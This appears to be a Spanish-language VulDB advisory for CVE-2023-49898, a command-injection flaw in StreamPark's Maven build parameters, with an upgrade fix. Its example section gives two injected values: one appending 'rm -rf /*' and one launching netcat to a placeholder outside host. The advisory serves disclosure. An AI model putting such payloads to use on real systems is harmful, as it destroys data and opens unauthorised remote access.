CVE-2023-49898 in StreamPark
Resumen
por VulDB • 2026-06-27
En streampark, existe un módulo de proyecto que integra la capacidad de compilación de Maven. Sin embargo, no hay una validación sobre los parámetros de compilación de Maven, lo que permite a los atacantes insertar comandos para la ejecución remota de comandos (RCE). El requisito previo para un ataque exitoso es que el usuario debe iniciar sesión en el sistema streampark y tener permisos a nivel de sistema. Por lo general, solo los usuarios del sistema tienen autorización para iniciar sesión, y no introducirían manualmente una orden peligrosa. Por tanto, el nivel de riesgo de esta vulnerabilidad es muy bajo.
Mitigación:
Todos los usuarios deben actualizar a la versión 2.1.2.
Ejemplo:
##Puede personalizar el método de concatenación según la situación de compilación del proyecto; para resultados exitosos de compilación con mvn use "&&", y en caso de fallo utilice "||" o "&&":
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
If you want to get best quality of vulnerability data, you may have to visit VulDB.